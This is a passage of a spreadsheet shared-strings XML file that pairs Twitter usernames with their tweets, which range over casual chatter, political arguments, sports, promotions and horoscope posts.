    <t>Angelwolf24</t>
  </si>
  <si>
    <t>@BassFishinMaine @DzintraSullivan @LordtBlackwell @paulblakeauthor @PeteCollins27 @_Jakeful @Daniel_Aegan @DesdemonaWren @dgarduno19 @MetaphoricallyK @EdwardVanWinkle @JeiceOfSpades @AncientLitDude @egdeaile_writer @AGirlNamed_Fred @WhoThat_One_Guy @seans_thoughts @CorryRue @OwenGRichardsId @Ned_the_zombie @DRBailey8 @MattSeeleypoems @disneymom1126 @DesideriaMesa @Jenna_Orion I just happen to be awake. Toys yo! 🤣🤣🤣</t>
  </si>
  <si>
    <t>GMIPartnership</t>
  </si>
  <si>
    <t>Dancing night in #southealing ? We are @west5bar tonight from 9:45pm till 1am offering #HIVtesting STI screening &amp; @doitldn packs. Come by for sexual health info https://t.co/9Cdaq8Zjjn @EalingCouncil https://t.co/3dA2xtcsr3</t>
  </si>
  <si>
    <t>car54man</t>
  </si>
  <si>
    <t>Trump and , increasingly America, is losing stature internationally. https://t.co/QtSmBXbKvg</t>
  </si>
  <si>
    <t>DICK__HUNTER</t>
  </si>
  <si>
    <t>My testicles are gleaming in the moonlight #JustSaying</t>
  </si>
  <si>
    <t>BackItHere</t>
  </si>
  <si>
    <t>When #data loss comes for your #business, nothing and no one is #safe! Stay protected from #data loss with #BackItHere!</t>
  </si>
  <si>
    <t>mitchryals</t>
  </si>
  <si>
    <t>“In response to the numerous inquiries about the misdemeanor charge placed yesterday, it is far too early to comment on the allegation," Hurwitz's attorney Paul F. Kemp said in an emailed statement...</t>
  </si>
  <si>
    <t>JajAndrewsjones</t>
  </si>
  <si>
    <t>@MayorofLondon @metpoliceuk why when a crime was reported in Islington last night was nothing done? a knife was pulled out on 2 young boys they was also assorted, the mother of one of the boys ran to the police, as the attackers was still riding round with the knife in his hand.</t>
  </si>
  <si>
    <t>_YohnLegend</t>
  </si>
  <si>
    <t>@Pv_Exposed Where the toxic women at that choke bac??? https://t.co/Kd1kCv1hUP</t>
  </si>
  <si>
    <t>RustyWeise</t>
  </si>
  <si>
    <t>@MiltownBucky @LibbyPiller Hoping for the best for you.</t>
  </si>
  <si>
    <t>LizReszke</t>
  </si>
  <si>
    <t>@Jack_Septic_Eye And we'd love to see you again!</t>
  </si>
  <si>
    <t>BigGuadelope</t>
  </si>
  <si>
    <t>@CurrenSy_Spitta ‘59 Impala with the cat eye taillights</t>
  </si>
  <si>
    <t>AsIfProds</t>
  </si>
  <si>
    <t>@100thingsilove @TJSeer @DriveThruRPG I don't do reviews at https://t.co/IJuJmFMfKb, but sometimes the community does, and I'd like to add your game to the indie games directory. Hopefully I can drive you some traffic. Here's the data I try to get for each game... https://t.co/5yzLAaJeQ5</t>
  </si>
  <si>
    <t>Driht_</t>
  </si>
  <si>
    <t>@haytoki1 Yeah they said some dumb shit and people fell for it, and are now frantically defending their views on everything they hold dear, because apparently everyone's opinion is directly attacking everyone else's opinion. It's actually exhausting to watch.</t>
  </si>
  <si>
    <t>HighlandsOpera</t>
  </si>
  <si>
    <t>Costumes are READY. The girls are prim and proper, while the boys are doin’ nothin’ but clowning around! Catch them TOMMORROW NIGHT for OPENING NIGHT of Ariadne auf Naxos: the opera with singing, dancing, comedy,… https://t.co/fEQvfnfJWO</t>
  </si>
  <si>
    <t>RayRobertsFilms</t>
  </si>
  <si>
    <t>The original price for these was £48. so vile</t>
  </si>
  <si>
    <t>Labreu_03</t>
  </si>
  <si>
    <t>Yellowstone and chill?</t>
  </si>
  <si>
    <t>Jeffreyaasen5</t>
  </si>
  <si>
    <t>@CptnCrackBaby Pink Floyd, Darkside of the moon. REO Speedwagon, Hi infidelity. And many many more.</t>
  </si>
  <si>
    <t>xXChampersXx</t>
  </si>
  <si>
    <t>@GamerGregCannon @WatchMixer Welcome I am new myself, but it has been amazing so fun. Dropping you a follow as we speak and hope to catch you in one of your streams soon.</t>
  </si>
  <si>
    <t>KingGama8</t>
  </si>
  <si>
    <t>@Miss_Sadie_V @CeleryVase @The_Ouroboros__ @VolumeRose @NickInEngland @annascanlon @MomsThoughts @DisabledTimes Absolutely. Furtwängler every time where Beethoven and Brahms are concerned. I don't like Toscanini's recordings at all.</t>
  </si>
  <si>
    <t>madelyn_nasuti</t>
  </si>
  <si>
    <t>@BradIey98 is that??? the block button??? i can see it so clearly</t>
  </si>
  <si>
    <t>Scraw87</t>
  </si>
  <si>
    <t>@devinedianakin @my2meows @fToRrEeEsSt1 @BernieIs46 @KrisK75WASF You got some reading to do now!! https://t.co/LthIbFFTOU</t>
  </si>
  <si>
    <t>The Gateway Pundit: Figures. Cop-Hater De Blasio Ordered New York Police to Help His Daughter Move https://t.co/T6CQwCPcuU</t>
  </si>
  <si>
    <t>venture_4th</t>
  </si>
  <si>
    <t>@DeskToDirtbag Great article @DeskToDirtbag Such an important decision to take before traveling :)</t>
  </si>
  <si>
    <t>dyouts</t>
  </si>
  <si>
    <t>@DoYouEvenLIf @Cptnrwrpnts Running self talk: How do I look touching this wall with a crack and with this black thing on my head? I could really use this wall at the border! I could really rebuild this wall!”</t>
  </si>
  <si>
    <t>FarFrm_ordinary</t>
  </si>
  <si>
    <t>@muet__ Lmfaooo the white dude 😂😂😂😂😂</t>
  </si>
  <si>
    <t>musicgamer460</t>
  </si>
  <si>
    <t>Main Cast Announced for ‘Halo’ TV Series https://t.co/xS7Je6Sc42 via @Cinelinx</t>
  </si>
  <si>
    <t>mxcharlier</t>
  </si>
  <si>
    <t>@TKASAScience Hmm it's all very weather dependent on the edge of the moors! I'd stay out of Plymouth as traffic can be a pain. Dartmoor zoo then a wander around Ivybridge!</t>
  </si>
  <si>
    <t>YoungAndWillful</t>
  </si>
  <si>
    <t>I will be updating this as more information comes, but from your lack of fucks given, I might need to take legal action as I ACTUALLY sold my blood for most of the things I own. I don't plan on being patient anymore. I've done all I can and you all have not. https://t.co/GdRMOqElie</t>
  </si>
  <si>
    <t>snarkysnowqueen</t>
  </si>
  <si>
    <t>@BradMossEsq @DebraDuGemini59 Of course Westerhout was right on. Trump, the morbidly obese moron who caters dinners with lukewarm fast food, would of course judge his own daughter like that. Did anyone doubt that?</t>
  </si>
  <si>
    <t>marksnewton</t>
  </si>
  <si>
    <t>3 IT leadership lessons from the Tour de France https://t.co/SKcqu80I9K</t>
  </si>
  <si>
    <t>GemmaHmm</t>
  </si>
  <si>
    <t>@fronteirastl 😂😂 it was the beginning of something that ended awfully 🤦🏼‍♀️</t>
  </si>
  <si>
    <t>iTrek5506</t>
  </si>
  <si>
    <t>@Delta Thank you for delaying my flight by 2 hours; then booking me on a later flight in coach after I paid for Delta Comfort# will no apology or compensation. Really worth it to pay extra for it only to get there 2 hours late and crampped in coach.</t>
  </si>
  <si>
    <t>LivingFromArt</t>
  </si>
  <si>
    <t>Practical advice and supplier information on merchandise from fellow artists. @TheWilsonChelt tonight 6.30 - 8.30 Last chance to book https://t.co/uIgA3dYGBg</t>
  </si>
  <si>
    <t>One_Before_2</t>
  </si>
  <si>
    <t>@deeelishes_ Lol it’s not ignorant.. sports teach bad kids discipline, team building etc Playing sports early helped me get my college engineering degree. Taught me how to focus</t>
  </si>
  <si>
    <t>zsir05</t>
  </si>
  <si>
    <t>How is my job gonna get mad cause I didn’t go want to go in on my day off???</t>
  </si>
  <si>
    <t>arrant_kyle</t>
  </si>
  <si>
    <t>@PaulyShore Caught up and excitedly awaiting more!! Doooodd!!!</t>
  </si>
  <si>
    <t>Tiana_Mxrie</t>
  </si>
  <si>
    <t>Bruh how did I answer 2 calls in my sleep and not remember either? 💀</t>
  </si>
  <si>
    <t>norfolkmum1</t>
  </si>
  <si>
    <t>@norfolkpainter @seasylvia2005 I actively seek out artists, artisans and makers and buy from them rather than big corporations. I’m not wealthy but when I have money to spend I make sure it trickles down 🙂</t>
  </si>
  <si>
    <t>RealtorRob01</t>
  </si>
  <si>
    <t>@pulte Give it Tomy daughter who is a first year school teacher. She is having to work 7 weeks before her first pay check and struggling to come up with money for rent</t>
  </si>
  <si>
    <t>tylergibson55</t>
  </si>
  <si>
    <t>I just earned the 'Riding Steady (Level 8)' badge on @untappd! https://t.co/KW2USdV2wC</t>
  </si>
  <si>
    <t>johnhorner</t>
  </si>
  <si>
    <t>I tried to think of the most controversial thing I could possibly say on Twitter and it's this: "Liking cats is not a personality type".</t>
  </si>
  <si>
    <t>CaulkWouldy</t>
  </si>
  <si>
    <t>All my mutuals and contemporaries are posting fire and I'm sitting here like https://t.co/NI54STz9su</t>
  </si>
  <si>
    <t>JessicaAllred_</t>
  </si>
  <si>
    <t>Liked on YouTube: Dan + Shay - From The Ground Up (Official Music Video) https://t.co/055y9jcAns</t>
  </si>
  <si>
    <t>SaintRoderick</t>
  </si>
  <si>
    <t>@demario__davis great to hear you on the @SouthBeachSesh your story is amazing bruh so happy to have you repsenting the @Saints , keep up the great work on and off the field #respect https://t.co/I8Jb5HxOgk</t>
  </si>
  <si>
    <t>PlentyTypos</t>
  </si>
  <si>
    <t>If you really like someone you gone make time to talk to them everyday no matter how busy you are</t>
  </si>
  <si>
    <t>evashminas</t>
  </si>
  <si>
    <t>@valeriejuIiette We’re literally going somewhere tomorrow just to spend money lmao pls buy your books</t>
  </si>
  <si>
    <t>CoeMollie</t>
  </si>
  <si>
    <t>@Insidecrypto22 @HackedOffHugh Its too too late! Were almost out And we'll manage perfectly okay if we all keep calm and carry on</t>
  </si>
  <si>
    <t>spicyabuela</t>
  </si>
  <si>
    <t>Oh wow and my dad says my anxiety and depression dont count as mental illness!!!!! 🥳🥳🤩</t>
  </si>
  <si>
    <t>ShawnaNewman</t>
  </si>
  <si>
    <t>More awesome scenery from the train. #scotland @ Aberdeen https://t.co/XsDmk0XII5</t>
  </si>
  <si>
    <t>seabus_status</t>
  </si>
  <si>
    <t>The Burrard Otter II SeaBus has arrived at Waterfront, Vancouver at 6:42 pm.</t>
  </si>
  <si>
    <t>HandsOffLondon</t>
  </si>
  <si>
    <t>@Omnishambles85 And then the major issues, like the violence when no-deal Brexit...and the latest leaver idea of holding an election in the middle of it... The far rights' fists cured me of Union...</t>
  </si>
  <si>
    <t>Brian_Wicker</t>
  </si>
  <si>
    <t>@TabTabbes @ivangbm Heck get paid to make earwax I’m in.</t>
  </si>
  <si>
    <t>MissLynneO</t>
  </si>
  <si>
    <t>@CaroleMoss5 @AndrewCMcCarthy @realDonaldTrump Maybe you should read the book.</t>
  </si>
  <si>
    <t>Martin50Mack</t>
  </si>
  <si>
    <t>@Teddybe32771267 @ClydeSSB @shinjukushug I keep repeating myself ffs have a look at ur tweets 🤦🏼‍♂️ I bet ur a armchair fan and come out of the wood work when yir team get a run of games going in their favour but when shit hits the fan that’s you back under you go until next time or season🏴󠁧󠁢󠁳󠁣󠁴󠁿🏴󠁧󠁢󠁳󠁣󠁴󠁿🏴󠁧󠁢󠁳󠁣󠁴󠁿</t>
  </si>
  <si>
    <t>rlarmstronglaw</t>
  </si>
  <si>
    <t>It's no secret that motorcycle accidents can result in life altering injuries and astronomical medical bills. If you or someone you know has been involved in a motorcycle accident, contact us today: https://t.co/iY9ZIATtrj https://t.co/6evQuE5rbi</t>
  </si>
  <si>
    <t>ayleen_yaritza</t>
  </si>
  <si>
    <t>Is it too late to stan BTS bc they cute</t>
  </si>
  <si>
    <t>agreenberg</t>
  </si>
  <si>
    <t>I fully support this -&gt; "Denmark Offers to Buy U.S." https://t.co/4cgL28zXEz</t>
  </si>
  <si>
    <t>Skinny_Minni</t>
  </si>
  <si>
    <t>I cannot believe my god baby is going to be 4 years old 😩💕</t>
  </si>
  <si>
    <t>pat_barnes1</t>
  </si>
  <si>
    <t>@SirBenfro just finished reading #NothingToHide great story loved it. Loved the inclusion of Madame Rose, cats, Jane Harrison,Grumpy Bob while Con was in Edinburgh! Hope there will be a third book some time in the future</t>
  </si>
  <si>
    <t>BerningAtheist</t>
  </si>
  <si>
    <t>@Theon_Orbis @BethR_27516 @jennycohn1 @nowthisnews @McCreadyForNC Mmmm. I dont remember saying that or even being sure. I hoped for sure. We have weaker competition this time. Just more of it. I predicted that Hillary would lose if she won, and I was right. #BernieWouldHaveWon</t>
  </si>
  <si>
    <t>lolbutter</t>
  </si>
  <si>
    <t>Wow I sure love being triggered into self hate by the dumbest shit</t>
  </si>
  <si>
    <t>woufur</t>
  </si>
  <si>
    <t>@hey_staphit @CheshireOnce Im defending the fact that she said kookie ain’t that cute 🤷🏻‍♀️ . If she body shamming someone that’s a completely different thing that i have no part of of. But me being okay with someone thinking a kpop star is ugly... well it ain’t that big of a deal. It’s an opinion not a fact</t>
  </si>
  <si>
    <t>YESWeDoIt4U</t>
  </si>
  <si>
    <t>Small Business Web Design Services &amp; Web Development. Make a statement with modern web design services designed to grow your business. Starting at $97.99 Ph: 980-333-4546 | Email: Info@YesWeDoit4U.com More Details at https://t.co/cgGJvX9vCk https://t.co/RntlrKI3nk</t>
  </si>
  <si>
    <t>Dan_Welter</t>
  </si>
  <si>
    <t>@Zhawk44 In the college atmosphere</t>
  </si>
  <si>
    <t>jennyaf619</t>
  </si>
  <si>
    <t>So much to do. So little time ! Fontana later today 🙌🏻</t>
  </si>
  <si>
    <t>Bones4life1990</t>
  </si>
  <si>
    <t>Who likes Free Books? I know I do. Here’s a Freebie: Fulfilled (Naughty Neighborhood) Synopsis Piper Vaughn has known Mark Lundgren since she was a kid and always figured they’d end up together. That is until… https://t.co/nNXjWhcuqA</t>
  </si>
  <si>
    <t>CosimadiRonda</t>
  </si>
  <si>
    <t>@SteveBarclay Looking out the window of our house stay in Arras. Lush gardens which 102 yrs ago were slap bang in the middle of German lines. 35k men died in Battle of Arras alone &amp; for what? For slime like you to resurface &amp; stoke a European civil war. Go to hell.</t>
  </si>
  <si>
    <t>hyunbinnlix</t>
  </si>
  <si>
    <t>BRO THIS IS REALLY MAKING ME QUESTION MY LOYALTIES HOW AM I SUPPOSED TO FEEL KNOWING FELIX IS OUT HERE LOOKING THIS DAMN GOOD WITH THAT LAVENDER HAIR AND THAT LEATHER JACKET https://t.co/TpbHYTNB58</t>
  </si>
  <si>
    <t>selfridge_mr</t>
  </si>
  <si>
    <t>@JGreenblattADL Yes!! do something about the Democrat Party. Much appreciated.</t>
  </si>
  <si>
    <t>BartLad69</t>
  </si>
  <si>
    <t>@liamxk @scottieboy32 Yeah, Who is the crowds who turn up nd watch this bonfire then?</t>
  </si>
  <si>
    <t>stayleyvegas</t>
  </si>
  <si>
    <t>@MarinaHyde I think the palace and celebrities work on a different planet that assumes the peasants can’t see the truth. Very verbose hoping we cant see through it. Hoping the big words confirm our stupidity.</t>
  </si>
  <si>
    <t>itslaurzzz</t>
  </si>
  <si>
    <t>aw imagine if calpol made drinks without the medicine, dangerous stuff</t>
  </si>
  <si>
    <t>Yeeezuus_</t>
  </si>
  <si>
    <t>I’m already making myself look like a clown so early in the morning.</t>
  </si>
  <si>
    <t>IBAOntario</t>
  </si>
  <si>
    <t>This year's Affiliate of the Year will receive a $5,000 cash prize to be used on new BIP swag, signage, digital marketing or initiatives to bolster the Affiliate brand and member experience, courtesy of @IBACanada. #IBAO19 https://t.co/Ih2XqELJFh https://t.co/J7MpmjgvRZ</t>
  </si>
  <si>
    <t>soteikat</t>
  </si>
  <si>
    <t>and now he probably doesn't even have a year left. my aunt just went to a wedding back home, and she said he can't have conversations and she could tell he 'sort of knew' they were related, but didn't know anyone's name....</t>
  </si>
  <si>
    <t>Verginger</t>
  </si>
  <si>
    <t>@emiliabrock We’ve been bonding since our dreams of 1984 Olympic Archery team glory pummeled to dust</t>
  </si>
  <si>
    <t>hauersugg</t>
  </si>
  <si>
    <t>ngl I kinda only like a few partnerships and I don’t want to judge to quickly but the one of the people I want to see go far I don’t think will</t>
  </si>
  <si>
    <t>craigjeffels</t>
  </si>
  <si>
    <t>@BatleyRLFC Shocking news. Thoughts are with his family, friends and everyone at Batley Bulldogs. 😔</t>
  </si>
  <si>
    <t>JoE_11_89</t>
  </si>
  <si>
    <t>Kelly May have said you throw a bomb I’ll throw a nuke..but at the end of the day...Vicki threw the nuke!! #RHOC</t>
  </si>
  <si>
    <t>TheMoeryCompany</t>
  </si>
  <si>
    <t>JP Moery wrote the book on membership development. Literally. Download his free #ebook today: "Five Keys to Association Membership Growth." https://t.co/vzekQ7v55U #membership #associations #nonprofits https://t.co/4aNROONXD5</t>
  </si>
  <si>
    <t>KatieGillott16</t>
  </si>
  <si>
    <t>@BLWilleford How amazing!!! Thank you for helping our students!!! #clearthelists #ReformEducation #support_a_teach https://t.co/N9KgWCLkrm</t>
  </si>
  <si>
    <t>TeeBabyy7</t>
  </si>
  <si>
    <t>@kennygotsoul I think you should have addressed it as respectfully as possible. 1) It could of been a teaching moment for her, she isn’t too old to learn 2) the next person may not have your same understanding</t>
  </si>
  <si>
    <t>ditackett67</t>
  </si>
  <si>
    <t>@shaunquixote And it’s those same people who will continue to buy guns they ban from law abiding Americans and continue to kill with them. But where does that leave the victims? DEFENSELESS</t>
  </si>
  <si>
    <t>calizona81</t>
  </si>
  <si>
    <t>@EugeneLeeYang when are you gonna be in a @tryguys video again? I miss you and I’m more than a little concerned. cc: @korndiddy @nedfulmer @KeithHabs</t>
  </si>
  <si>
    <t>TropicsM</t>
  </si>
  <si>
    <t>Decatur’s finest Murray Browne rejoins ToM to revisit Alistair Horne’s A Savage War of Peace and the lessons it can teach about colonialism and so-called counterinsurgency https://t.co/TGbQRbg55F</t>
  </si>
  <si>
    <t>MasculineLife</t>
  </si>
  <si>
    <t>@HunterDrewTFA Binary fits her narrative and she doesn’t read very well. 👍 I’m pretty sure you never uttered those words on paper or otherwise. Ffs</t>
  </si>
  <si>
    <t>TinyJewRachelB</t>
  </si>
  <si>
    <t>@Taylor_Faith_ A month goes by and Rachel texted Taylor.</t>
  </si>
  <si>
    <t>jenwillis</t>
  </si>
  <si>
    <t>I am outraged and heartbroken and afraid. Any response by leadership that doesn't involve immediate action to end the violence and protect lives is abject failure, irresponsible, and immoral—and ultimately becomes culpability when the next shooting occurs.</t>
  </si>
  <si>
    <t>donna_g3</t>
  </si>
  <si>
    <t>@tikerbellindix1 @Sofuggit2 @YouTube You refer to stalking yet isn't that what Lyndy does literally every dam day? All that comes out of her mouth is her assumptions of everyone else's life. She spews her lies daily. GTFOH 🙄</t>
  </si>
  <si>
    <t>FriedericyDolls</t>
  </si>
  <si>
    <t>Excellent service of locally sourced fine ingredients and the restaurant's own garden. Menu continuously evolves with new dishes.</t>
  </si>
  <si>
    <t>EAmanda95</t>
  </si>
  <si>
    <t>Rushing toward permanence is a misstep when you’re operating i... More for Scorpio https://t.co/L1LeAWSxPT</t>
  </si>
  <si>
    <t>HomewardPathMTG</t>
  </si>
  <si>
    <t>@m1cromanag3r Archer, Family Guy, Bob's Burgers are our favorites, but we've also watched a lot of Simpson's, South Park, Sealab 2021, Harvey Birdman, and others. I was also in a minority that didn't actively hate The Cleveland Show</t>
  </si>
  <si>
    <t>Gregory_Hazel</t>
  </si>
  <si>
    <t>@mattjgreg1711 @vivienne_de_vil @UnderbellyFest Come and see us in person 😉</t>
  </si>
  <si>
    <t>SJRandom1</t>
  </si>
  <si>
    <t>@AlJenko98 Now we have someone who wants to put more money into social care, which is fine, but wants commitments on spending regardless of the outcome on Brexit. She doesn't quite get the idea that Brexit defines what everything else is,and until you sort that, everything else is on hold.</t>
  </si>
  <si>
    <t>CallmeDownsie</t>
  </si>
  <si>
    <t>@TrueFactsStated Frankly, if he was flogging an iPhone on eBay, only an eejit would throw a bid in. You'd end up with an Alcatel.</t>
  </si>
  <si>
    <t>Mrjj321Matt</t>
  </si>
  <si>
    <t>This goodwood race is almost closer to the start of tommorows card now</t>
  </si>
  <si>
    <t>Rdoro33173</t>
  </si>
  <si>
    <t>@realDonaldTrump ANOTHER DAY OF MINDLESS TWEETS , WHILE HE SHOULD BE WORKING . We call you thief , because you WASTE TIME tweeting while on the USA 's CLOCK its 10 30 am in dc and EVERYONE ELSE IS DOING WHAT THEY ARE PAID TO DO TRUMP USELESS TIME WASTING LIAR AND CHILD RAPING RACIST TRASH</t>
  </si>
  <si>
    <t>Corybackus1</t>
  </si>
  <si>
    <t>@QueenMommyDom @rt4_dommes @OddDoctor @AlissaBlacksPET @tonybobo3 @DommeLinx @CamgirlMistress @justwowwow @CMGKOBAbes @rtfemdom1 @AdultModelProm1 So beautiful and sexy</t>
  </si>
  <si>
    <t>AndyP792</t>
  </si>
  <si>
    <t>@Andy_IFLTV can't split them just now but I think its got the clash of styles for a proper fight. Both hit hard enough to do damage, both good boxer punchers.</t>
  </si>
  <si>
    <t>keoshamb</t>
  </si>
  <si>
    <t>@latema_k tema shut up</t>
  </si>
  <si>
    <t>yewandeslondon</t>
  </si>
  <si>
    <t>@folukeifejola lovely love letter to Nigeria.Can you folow me back. Thanks.</t>
  </si>
  <si>
    <t>wazoot</t>
  </si>
  <si>
    <t>guess who’s Elgato is coming in today guess who’s gonna stream for the first time in a few weeks tonight</t>
  </si>
  <si>
    <t>_elHefe3</t>
  </si>
  <si>
    <t>@Hubbs29 You already know, and just a lot of shit going on</t>
  </si>
  <si>
    <t>Mohape_</t>
  </si>
  <si>
    <t>@barriola_35 I could’ve sworn you guys are the 4th seed</t>
  </si>
  <si>
    <t>DeathByLiars</t>
  </si>
  <si>
    <t>@Scattered211 @MattEIce913 @NBCNews "Mistakenly" just means they didn't think the press would get it. https://t.co/7HoL7z3qHx</t>
  </si>
  <si>
    <t>dkazmer</t>
  </si>
  <si>
    <t>Just saw this episode of Dragon's Den and all the dragons wanted in on this deal. This here is a lesson on the importance of basic science - even some physics - education. https://t.co/FSvErd2fSD</t>
  </si>
  <si>
    <t>CharityParkerso</t>
  </si>
  <si>
    <t>Be careful what you wish for. A twisted fairy tale that's now available in #Audio https://t.co/IKzyV70hVg</t>
  </si>
  <si>
    <t>sp3427</t>
  </si>
  <si>
    <t>(3/3) Writing is not a strength of mine. So while the posts and how I express my journey is not in anyway eloquent or poetic, my expressions are as heartfelt and honest as they could possibly be. Perhaps they can be of some help to anyone thinking of approaching Miss Nikki.</t>
  </si>
  <si>
    <t>PPP_Plays</t>
  </si>
  <si>
    <t>#NowPlaying Montaigne - Ready [The Gov, 7 November] Tune in: https://t.co/aljzDeTpMq https://t.co/q18hYiooCP</t>
  </si>
  <si>
    <t>ugo_chi17</t>
  </si>
  <si>
    <t>Set ambitious intentions for what you desire to manifest in pa... More for Capricorn https://t.co/AK41PyHqwn</t>
  </si>
  <si>
    <t>degomikec</t>
  </si>
  <si>
    <t>@iglen31 GOAT level talents are ALWAYS obvious...and Leaf has a ton of talent but wasted it. He’s admitted as such. You’re telling me he tried his best and just wasn’t capable of being good? Do you understand sports that little? Wait, as a pats fan you clearly don’t.</t>
  </si>
  <si>
    <t>Yahwehtheking</t>
  </si>
  <si>
    <t>I'm off this. Definitely too selective with who I fuck so what's the point 🤷‍♂️</t>
  </si>
  <si>
    <t>HannahSpangle</t>
  </si>
  <si>
    <t>@thehistoryguy I live in Nottingham and tweeted this a while ago. Can anyone clarify? https://t.co/6VVAysaxex</t>
  </si>
  <si>
    <t>TDL4VT</t>
  </si>
  <si>
    <t>@Nsage74 Welcome to the #HokieNation Noah #GoHokies</t>
  </si>
  <si>
    <t>AngelFan_4Life</t>
  </si>
  <si>
    <t>@__Doe_Eyes__ I don't all those people following me,especially if we have nothing in common and I know that you're never going to talk to me!?</t>
  </si>
  <si>
    <t>lilbuddyspd11</t>
  </si>
  <si>
    <t>@zivinilee @BetorFor @kurteichenwald @BetoORourke Look at the polls people actually like those ideas. Sorry to break it to you she will be the nominee when this is all said and done.</t>
  </si>
  <si>
    <t>run_york</t>
  </si>
  <si>
    <t>OxyContin maker Purdue Pharma offers up to $12B deal, report says https://t.co/Ujr2NAg3MQ https://t.co/z0iLoWJNRH</t>
  </si>
  <si>
    <t>MalcomWessing</t>
  </si>
  <si>
    <t>@redhead_ordead That's so cute and creative!</t>
  </si>
  <si>
    <t>1804dolph</t>
  </si>
  <si>
    <t>We literally gave them the game</t>
  </si>
  <si>
    <t>BurstUnitStills</t>
  </si>
  <si>
    <t>DP @Karl_poyzer and @matt_kirby75 during filming of Deaf Funny programmes 3 / 4 for the @BSLZone #unitstills https://t.co/qAjNuDFMgK</t>
  </si>
  <si>
    <t>JohnCHLindberg</t>
  </si>
  <si>
    <t>As someone who is passionate about nuclear (what gave me away?), climate change and achieving sustainability, it is sad to see how the #nuclear and #renewables folks engages in a trench war, when the real enemy-fossil fuels-just stands by, enjoying the view, and remains dominant.</t>
  </si>
  <si>
    <t>ypphatis</t>
  </si>
  <si>
    <t>INFO O. WND: 060/10. QNH: 1022. RWY 03 ARR 03 DEP VIA OTLED, AVNEX, MANDU, SOLUS &amp; KEELS, 06 FOR ALL OTHER DEP. WX: CAVOK. TMP: 13.</t>
  </si>
  <si>
    <t>medic6423</t>
  </si>
  <si>
    <t>I AM saying that @realDonaldTrump Is DIRECTLY RESPONSIBLE for the KILLING today in #ElPasoShooting He may not have pulled the trigger but HE DID FLIP THE SWITCH! His SUPPORTERS listen to his rhetoric and DOG WHISTLES! He is #UnfitForOffice #racism #immigration #Accomplice</t>
  </si>
  <si>
    <t>roslynvchand</t>
  </si>
  <si>
    <t>@HeidiGM @VincentRK @jonathanrockoff @peterbachmd Thank you for sharing. Mandatory switching required in British Columbia for etanercept, infliximab, and insulin glargine. https://t.co/4sCyU2Ljq9</t>
  </si>
  <si>
    <t>thelampoonist1</t>
  </si>
  <si>
    <t>@marklevinshow There are no consequences for the criminal behavior &amp; treachery of these apparatchiks. Christian Putin expelled the Oligarchs raping &amp; pillaging Russia's economy &amp; radial fifth column enemies &amp; pursues detente w/Trump. That's why he's loved by Russians &amp; called a dictator.</t>
  </si>
  <si>
    <t>AngloSaxonUK</t>
  </si>
  <si>
    <t>@amandadonnell14 It's about time we stopped defending Z German's from the Russians</t>
  </si>
  <si>
    <t>jordynxbailey</t>
  </si>
  <si>
    <t>Steer your ship in any direction you desire now. The truth is ... More for Cancer https://t.co/HI6UwNIi1b</t>
  </si>
  <si>
    <t>lindaghomes</t>
  </si>
  <si>
    <t>@KinkySplash @1PromoterBoat @hedonistforlife @UKCuteGirlLucy2 Follow and you get a surprise in DM #porn 😋 #sex 😐😉 https://t.co/3BvtYHRc5z 🤤🗽</t>
  </si>
  <si>
    <t>TheRealElGuru</t>
  </si>
  <si>
    <t>@AlZeidenfeld Bobbled snap... simple 3-step approach... Kept his head down and followed through before slowly raising his head 👀 🙌🏽 @Buccaneers @Chargers @ChicagoBears 😂😂😂 https://t.co/4gqsN5TUgb</t>
  </si>
  <si>
    <t>sainsburys</t>
  </si>
  <si>
    <t>@ReferralOneplus Hi there, this is still currently in the trial stages but we're hoping to roll it out if the trial is successful. Danny</t>
  </si>
  <si>
    <t>taternuts12</t>
  </si>
  <si>
    <t>You are EXACTLY what what people warned us about, tried given you the benefit of the doubt, now I just feel stupid 😅😅</t>
  </si>
  <si>
    <t>ChocOnTour</t>
  </si>
  <si>
    <t>Var is going to make football so boring.</t>
  </si>
  <si>
    <t>PURE_NASCAR</t>
  </si>
  <si>
    <t>@TCheckered @TalladegaSuperS @JimmieJohnson. Personally, I cannot count 7X out of the playoffs. We'll see...</t>
  </si>
  <si>
    <t>Zacshi130</t>
  </si>
  <si>
    <t>@OGSwitchBabe @AmandaStingWCW @black_baymax8 @TheQueenofNE @DYWTSB @ELGhostMomma @BadlandsPod @goodbadwrestle @BrainbustaRadio @VisWrestleNet I am still in awe, squirt!! When I saw the prototype, I almost cried. I knew I was right to trust Chris. Ya don't rush awesome art. Let the artist work their magic. He kicked ass.</t>
  </si>
  <si>
    <t>marinashutup</t>
  </si>
  <si>
    <t>Y’all, I just realized I was 16 TEN YEARS AGO. What the fuck???</t>
  </si>
  <si>
    <t>BobTBG</t>
  </si>
  <si>
    <t>@grhmthmsn This was a Christmas present one year. Oh the fun.</t>
  </si>
  <si>
    <t>Flintcoin</t>
  </si>
  <si>
    <t>@Y0katsu @mikafrak @sdkstl @MikeMadden @NationalMallNPS @realDonaldTrump I know you leftists like to be hysterical but I don't quite think this is near the same territory. Anyone tried anything like that would be best advised not to. Bad for your health.</t>
  </si>
  <si>
    <t>K_Geezy74</t>
  </si>
  <si>
    <t>This chase on #LivePD is about to make me pee myself and I'm in bed 😳😳😳</t>
  </si>
  <si>
    <t>fastfil7</t>
  </si>
  <si>
    <t>@ItsFangs @Pro_Cuts Also most men get out in 5-10 min women with long hair takes much longer and for those who have curls it’s even longer tweets like this are not helping the cause</t>
  </si>
  <si>
    <t>NeutronMike</t>
  </si>
  <si>
    <t>Gym procrastination. Off for a 2 hour session and know it is going to hurt. Possibly starting to look reasonable now.</t>
  </si>
  <si>
    <t>dollytrollpe</t>
  </si>
  <si>
    <t>@Lilyladles @DavidHeadViews @acgrayling Even in remain London, more voted to leave the EU than for Khan. I live in a London borough that the vast majority voted to leave</t>
  </si>
  <si>
    <t>Bibliotreasures</t>
  </si>
  <si>
    <t>A rare night out with my lovely man last night at the gin festival at @BritishOakShef I may have started flaring before we left ridiculously early thanks to #Fibromyalgia but it was good to dress up and be normal, even for two hours https://t.co/jSBKZk1WtZ https://t.co/pLbDC64GqC</t>
  </si>
  <si>
    <t>NoNamePat</t>
  </si>
  <si>
    <t>No time for explanation. ⚾️A's F5 -0.5 (-125) ⚾️A's F5 UNDER 5 Runs #aryasproppicks https://t.co/avmuxxv97s</t>
  </si>
  <si>
    <t>1067WLLZ</t>
  </si>
  <si>
    <t>Happy Labor Day Weekend! It's a WLLZ 'A to Z Weekend' on 106.7 Detroit's Wheels! We will be playing the best damn rock on the radio all Labor Day weekend starting with the letter A and we won't stop until we get to Z! Listen live: https://t.co/1wum9AyUqz https://t.co/GGn4CxjEeL</t>
  </si>
